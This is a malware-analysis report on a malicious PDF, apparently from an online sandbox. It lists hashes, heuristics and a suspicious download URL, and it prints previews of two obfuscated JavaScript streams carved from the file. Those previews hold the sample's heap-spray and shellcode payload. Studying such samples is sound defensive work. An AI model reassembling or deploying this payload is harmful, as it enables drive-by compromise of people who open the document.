PDF malware analysis — malicious · 7b8c96a41ac34136

MALICIOUS

PDF

6.9 KB

MD5: 8e4d0e370d5c2da0b7acbd735af8dc3e SHA-1: 601c3d31049c306aba227182d0467f67aa3b1151 SHA-256: 7b8c96a41ac341367275fbd40c35592e36ceeb6257dc1202af4553d5b16c4af3

68 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript which is obfuscated but references a suspicious URL. This JavaScript is likely responsible for downloading and executing a secondary payload, as indicated by the ML classifier and heuristic firings. The presence of embedded JavaScript and the suspicious URL strongly suggest a malicious intent to compromise the user's system.

Machine Learning

Nyx PDF Classifier malicious score 0.9999

Heuristics 4

Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://www1.safeik-checker.it.cx/?bynm=htzb0bDG3sqP4JbHpZ2ToJWY1u3aqqOSyJqhno%2BczZbGkdnln6qhn6yZl5ieo2KJ1NignJWimZ%2FPz9XTo7i2r1PT0cmgnovlhg%3D%3D Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0005_000.js` `27b7ab0474973a27f5695f445f84e2133417f7f5cf4aaa6831c45306d2cac179`	pdf-javascript-stream	PDF /JS object 5 at offset 0x1BD	6311 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s). Carved artifact contains 1 long hex-escaped blob(s).
Preview script First 1,000 lines of the extracted script hoGf='TDyRN';if (hoGf=='AXMmT') xTXGg();ijNber='hhGfM';if (ijNber=='Qpbg') ACCG();function KUDjmM(){var pvJB='LNqXWb';xneBR='lNXQv';if (xneBR=='oPFSt') XIPgEw();} UtTSxMGs="http://www1.safeik-checker.it.cx/?bynm=htzb0bDG3sqP4JbHpZ2ToJWY1u3aqqOSyJqhno%2BczZbGkdnln6qhn6yZl5ieo2KJ1NignJWimZ%2FPz9XTo7i2r1PT0cmgnovlhg%3D%3D"; var HOPa='xSAMIg';var ZLgEg=44;tjxRZV='eZrg';if (tjxRZV=='FrYEdx') wocwnC='pxYta'; var PKbiByz = "rav\ns lleh'=%8E%00%00%00%00%D5%38%DE%50%13%9C%46%B8%17%03%B8%67%C0%B8%67%C1%B8%64%80%B8%E7%02%B8%63%66%93%F4%81%57%2F%EB%2D%00%00%00%10%EE%FB%EB%00%00%00%10%FE%8E%36%10%00%00%98%AE%18%2C%2D%00%00%00%25%86%08%00%00%00%FF%59%EB%00%00%00%98%AE%18%2C%2D%00%00%00%13%6F%10%2C%A8%C9%53%3E%10%00%00%08%BF%00%47%60%88%C1%23%64%BE%EE%6C%40%23%00%98%AE%18%2C%5C%10%00%00%25%FF%59%2C%00%00%00%98%AE%18%2C%0D%10%00%00%25%05%FF%59%6C%00%00%00%A6%00%A6%00%98%AE%18%2C%2D%00%00%00%25%98%AE%18%2C%2F%10%00%00%25%A6%00%FF%0D%A6%50%98%AE%18%2C%2D%00%00%00%25%FF%59%AC%00%00%00%A6%00%FF%59%EC%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%56%47%45%56%D6%07%05%16%47%86%14%00%C4%F6%16%46%C4%96%26%27%16%27%97%14%00%74%56%47%05%27%F6%36%14%46%46%27%56%37%37%00%75%96%E6%54%87%56%36%00%54%87%96%47%05%27%F6%36%56%37%37%00%BB%98%2F%98%7F%03%0C%EA%57%DF%92%7F%98%9F%13%0C%EB%C3%00%00%00%30%5B%B9%10%00%00%66%DA%30%58%B9%10%00%00%B8%07%87%38%6C%C1%30%5B%B9%10%00%00%D8%DB%F9%10%00%00%DA%30%58%B9%10%00%00%BA%DA%30%58%B9%10%00%00%05%BA%DA%30%58%B9%10%00%00%BA%E5%13%BD%DA%65%30%58%B9%10%00%00%98%6C%98%7D%15%CF%3F%6A%95%47%40%E5%34%BE%9E%E5%39%1D%0E%30%58%7A%10%00%00%13%6F%69%66%DA%1C%0E%20%30%58%F9%10%00%00%98%6C%DA%30%58%B9%10%00%00%3C%BE%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%98%58%B9%10%00%00%65%75%8E%85%FF%FF%FF%F5%E5%BA%10%EC%08%E3%BB%47%20%BE%DE%3C%55%25%C4%D4%F4%E4%E2%44%C4%C4%00%55%25%C4%44%F6%77%E6%C6%F6%16%46%45%F6%64%96%C6%56%14%00%E4%47%66%37%F5%34%C6%56%16%E6%E2%56%87%56%00f\n;'nuoitc nnUotci(edohtrtSeni{ )gi\nt( fehirtSgnnel.tg % h)2eht tSgnir+ \\\" =0x\n;\"0avnu rciSedort gni =\n;''ofv( rra0=i ; < ihtrtSeniel.ggn ;ht+i )2=\n{ ravhtinUeoc 1ed =Sehtrt.gnihcoCraedi(tA.)tSotir1(gn)6Uot.ppaCrees\n;)(fiht( Ueocinedel.1gn==ht)1eht nUdoci1e\"0\"=t+nUehci1edo\n; ravhtinUeoc 2ed =Sehtrt.gnihcoCraedi(tA1+ot.)tSgnir1(t.)6UoreppaC)(es\n;( fihtinUeoc.2edelhtgn==t )1ehcinUdo\"=2e\"0eht+nUdoci2eht\n;Ueocined' = u% + 'htinUeoc+2edhtinUeoc;1edu\nocinedirtSgn =+ htinUeoc\n;ed\n}uternrinu octSedir\n;gn\n} ravhs1lle= Uot inedocu(csenpahs(eleU+)lTtGMxS+s=t&\"11nu+\"seepac\"(\"00%))av\n; rlehs2lt = Uoocinedenu(cs(epahs)lleU+xSTtGM&\"+s=t+\"21nuacseep0%\"(\"0\n;))ufitcnnotxe nele(dmeot ,l_{)new\nelihe(.melelhtgn2_ot<ele{)nele=+mel\n};mlee=meelus.msbnirt(got,0l_2/ne;)ter\nrule nme\n}\n;ufitcnno(xb {)rav\na yarrn=A werr)(ya\n; ravapaoly=dsenuacs(epeh)1ll\n; ravcsnel_p=olyadanel.tg;2hv\nn raponu=sseepac\"(09u%0909u%09\n;)\"one=sptx(dneon ,spx0000400cs(-l_0+ne3x;))8v\nc rauo=2tn0(0c0x0c-c0cx0000400x0/)040000\n;(rofavoc rnu;0=toc<tnuoc2tnuc;tnuo++a\n{)rrc[yauo=]tnonp+spyadaol\n;av\n} rrevolfu=woenpacs(e0u%\"0c0u%c0c;)\"cw\neliho(frevolel.wgn4<ht94{)25volfrewovo=+rewolf};iht\n.sllocbarotS=elloCbaloc.elmEtciafnIl(obus{:jm,\"\"gsevo:fr}wol;)f\n}\nnuoitc nrp_fni)(ft\n{=ponnuacseepu%\"(A0u%A0A0u%A0A0u%A0A0)\"A0\n; ravapaoly=dsenuacs(epeh)2ll\n;paehlb=kcoonap+ply;daob\nlbgiconu=kseepac\"(A0u%A0A0u%A0\n;)\"ehredais2=ez;0rps\nyaaeh=edzisr+epaehlb.kcoelhtgn\n;lihw(ebgiboll.kcne<htgps)yar\n{bgibol=+kcibolbgkc\n}\n;iflbllcoib=kbgkcols.tsbuir0(gns,yarp;)olb\nkcgib=lb.kcousrtsbni,0(gibolbgkcnel.tgps-har\n;)yhw(elilb.kcoelhtgns+yarp0<004x00b\n{)olb=kcolb+kcolf+kcliolblkc\n}\n;emen=m warrA(yf\n;)ro0=i(i;041<;0)++i\n{[mem]iolb=kcaeh+bpkcol\n;av\n} r=mun21999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888tu\n;liirp.tn%\"(f54f000,\")mun\n;Pa\n}ulsniga=p.ppulsnIg\n; ravvsrap=es(tnIpaiv.pweeVresr.noioti ... (truncated)
`javascript_obj0005_001.js` `68523d0a534948edcd33fc34845f6a2913aa45924ce943100f06507ad5d6e2c2`	pdf-javascript-stream	PDF /JS object 5 at offset 0x1E0	6594 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s). Carved artifact contains 1 long hex-escaped blob(s).
Preview script First 1,000 lines of the extracted script hoGf='TDyRN';if (hoGf=='AXMmT') xTXGg();ijNber='hhGfM';if (ijNber=='Qpbg') ACCG();function KUDjmM(){var pvJB='LNqXWb';xneBR='lNXQv';if (xneBR=='oPFSt') XIPgEw();} UtTSxMGs="http://www1.safeik-checker.it.cx/?bynm=htzb0bDG3sqP4JbHpZ2ToJWY1u3aqqOSyJqhno%2BczZbGkdnln6qhn6yZl5ieo2KJ1NignJWimZ%2FPz9XTo7i2r1PT0cmgnovlhg%3D%3D"; var HOPa='xSAMIg';var ZLgEg=44;tjxRZV='eZrg';if (tjxRZV=='FrYEdx') wocwnC='pxYta'; var PKbiByz = "rav\ns lleh'=%8E%00%00%00%00%D5%38%DE%50%13%9C%46%B8%17%03%B8%67%C0%B8%67%C1%B8%64%80%B8%E7%02%B8%63%66%93%F4%81%57%2F%EB%2D%00%00%00%10%EE%FB%EB%00%00%00%10%FE%8E%36%10%00%00%98%AE%18%2C%2D%00%00%00%25%86%08%00%00%00%FF%59%EB%00%00%00%98%AE%18%2C%2D%00%00%00%13%6F%10%2C%A8%C9%53%3E%10%00%00%08%BF%00%47%60%88%C1%23%64%BE%EE%6C%40%23%00%98%AE%18%2C%5C%10%00%00%25%FF%59%2C%00%00%00%98%AE%18%2C%0D%10%00%00%25%05%FF%59%6C%00%00%00%A6%00%A6%00%98%AE%18%2C%2D%00%00%00%25%98%AE%18%2C%2F%10%00%00%25%A6%00%FF%0D%A6%50%98%AE%18%2C%2D%00%00%00%25%FF%59%AC%00%00%00%A6%00%FF%59%EC%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%56%47%45%56%D6%07%05%16%47%86%14%00%C4%F6%16%46%C4%96%26%27%16%27%97%14%00%74%56%47%05%27%F6%36%14%46%46%27%56%37%37%00%75%96%E6%54%87%56%36%00%54%87%96%47%05%27%F6%36%56%37%37%00%BB%98%2F%98%7F%03%0C%EA%57%DF%92%7F%98%9F%13%0C%EB%C3%00%00%00%30%5B%B9%10%00%00%66%DA%30%58%B9%10%00%00%B8%07%87%38%6C%C1%30%5B%B9%10%00%00%D8%DB%F9%10%00%00%DA%30%58%B9%10%00%00%BA%DA%30%58%B9%10%00%00%05%BA%DA%30%58%B9%10%00%00%BA%E5%13%BD%DA%65%30%58%B9%10%00%00%98%6C%98%7D%15%CF%3F%6A%95%47%40%E5%34%BE%9E%E5%39%1D%0E%30%58%7A%10%00%00%13%6F%69%66%DA%1C%0E%20%30%58%F9%10%00%00%98%6C%DA%30%58%B9%10%00%00%3C%BE%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%98%58%B9%10%00%00%65%75%8E%85%FF%FF%FF%F5%E5%BA%10%EC%08%E3%BB%47%20%BE%DE%3C%55%25%C4%D4%F4%E4%E2%44%C4%C4%00%55%25%C4%44%F6%77%E6%C6%F6%16%46%45%F6%64%96%C6%56%14%00%E4%47%66%37%F5%34%C6%56%16%E6%E2%56%87%56%00f\n;'nuoitc nnUotci(edohtrtSeni{ )gi\nt( fehirtSgnnel.tg % h)2eht tSgnir+ \\\" =0x\n;\"0avnu rciSedort gni =\n;''ofv( rra0=i ; < ihtrtSeniel.ggn ;ht+i )2=\n{ ravhtinUeoc 1ed =Sehtrt.gnihcoCraedi(tA.)tSotir1(gn)6Uot.ppaCrees\n;)(fiht( Ueocinedel.1gn==ht)1eht nUdoci1e\"0\"=t+nUehci1edo\n; ravhtinUeoc 2ed =Sehtrt.gnihcoCraedi(tA1+ot.)tSgnir1(t.)6UoreppaC)(es\n;( fihtinUeoc.2edelhtgn==t )1ehcinUdo\"=2e\"0eht+nUdoci2eht\n;Ueocined' = u% + 'htinUeoc+2edhtinUeoc;1edu\nocinedirtSgn =+ htinUeoc\n;ed\n}uternrinu octSedir\n;gn\n} ravhs1lle= Uot inedocu(csenpahs(eleU+)lTtGMxS+s=t&\"11nu+\"seepac\"(\"00%))av\n; rlehs2lt = Uoocinedenu(cs(epahs)lleU+xSTtGM&\"+s=t+\"21nuacseep0%\"(\"0\n;))ufitcnnotxe nele(dmeot ,l_{)new\nelihe(.melelhtgn2_ot<ele{)nele=+mel\n};mlee=meelus.msbnirt(got,0l_2/ne;)ter\nrule nme\n}\n;ufitcnno(xb {)rav\na yarrn=A werr)(ya\n; ravapaoly=dsenuacs(epeh)1ll\n; ravcsnel_p=olyadanel.tg;2hv\nn raponu=sseepac\"(09u%0909u%09\n;)\"one=sptx(dneon ,spx0000400cs(-l_0+ne3x;))8v\nc rauo=2tn0(0c0x0c-c0cx0000400x0/)040000\n;(rofavoc rnu;0=toc<tnuoc2tnuc;tnuo++a\n{)rrc[yauo=]tnonp+spyadaol\n;av\n} rrevolfu=woenpacs(e0u%\"0c0u%c0c;)\"cw\neliho(frevolel.wgn4<ht94{)25volfrewovo=+rewolf};iht\n.sllocbarotS=elloCbaloc.elmEtciafnIl(obus{:jm,\"\"gsevo:fr}wol;)f\n}\nnuoitc nrp_fni)(ft\n{=ponnuacseepu%\"(A0u%A0A0u%A0A0u%A0A0)\"A0\n; ravapaoly=dsenuacs(epeh)2ll\n;paehlb=kcoonap+ply;daob\nlbgiconu=kseepac\"(A0u%A0A0u%A0\n;)\"ehredais2=ez;0rps\nyaaeh=edzisr+epaehlb.kcoelhtgn\n;lihw(ebgiboll.kcne<htgps)yar\n{bgibol=+kcibolbgkc\n}\n;iflbllcoib=kbgkcols.tsbuir0(gns,yarp;)olb\nkcgib=lb.kcousrtsbni,0(gibolbgkcnel.tgps-har\n;)yhw(elilb.kcoelhtgns+yarp0<004x00b\n{)olb=kcolb+kcolf+kcliolblkc\n}\n;emen=m warrA(yf\n;)ro0=i(i;041<;0)++i\n{[mem]iolb=kcaeh+bpkcol\n;av\n} r=mun21999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888tu\n;liirp.tn%\"(f54f000,\")mun\n;Pa\n}ulsniga=p.ppulsnIg\n; ravvsrap=es(tnIpaiv.pweeVresr.noioti ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.